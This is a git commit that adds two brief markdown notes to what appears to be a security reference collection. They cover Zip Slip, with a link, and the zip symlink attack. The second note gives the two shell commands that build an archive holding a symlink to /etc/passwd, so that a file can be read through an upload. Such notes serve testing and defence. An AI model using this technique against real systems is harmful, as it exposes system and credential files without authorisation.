bump
This commit is contained in:
parent
3834c1617e
commit
ef401ad5ed
|
@ -0,0 +1,3 @@
|
||||||
|
# Zip Slip
|
||||||
|
|
||||||
|
* [snyk's ZipSlip repository](https://github.com/snyk/zip-slip-vulnerability)
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Zip Symlink
|
||||||
|
|
||||||
|
https://effortlesssecurity.in/zip-symlink-vulnerability/
|
||||||
|
|
||||||
|
The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
|
||||||
|
Create a symlink and put it in a zip file.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ln -s /etc/passwd link.name
|
||||||
|
```
|
||||||
|
|
||||||
|
compress it leaving symlinks intact
|
||||||
|
|
||||||
|
```sh
|
||||||
|
zip -r --symlinks mal.zip link.name
|
||||||
|
```
|
Loading…
Reference in New Issue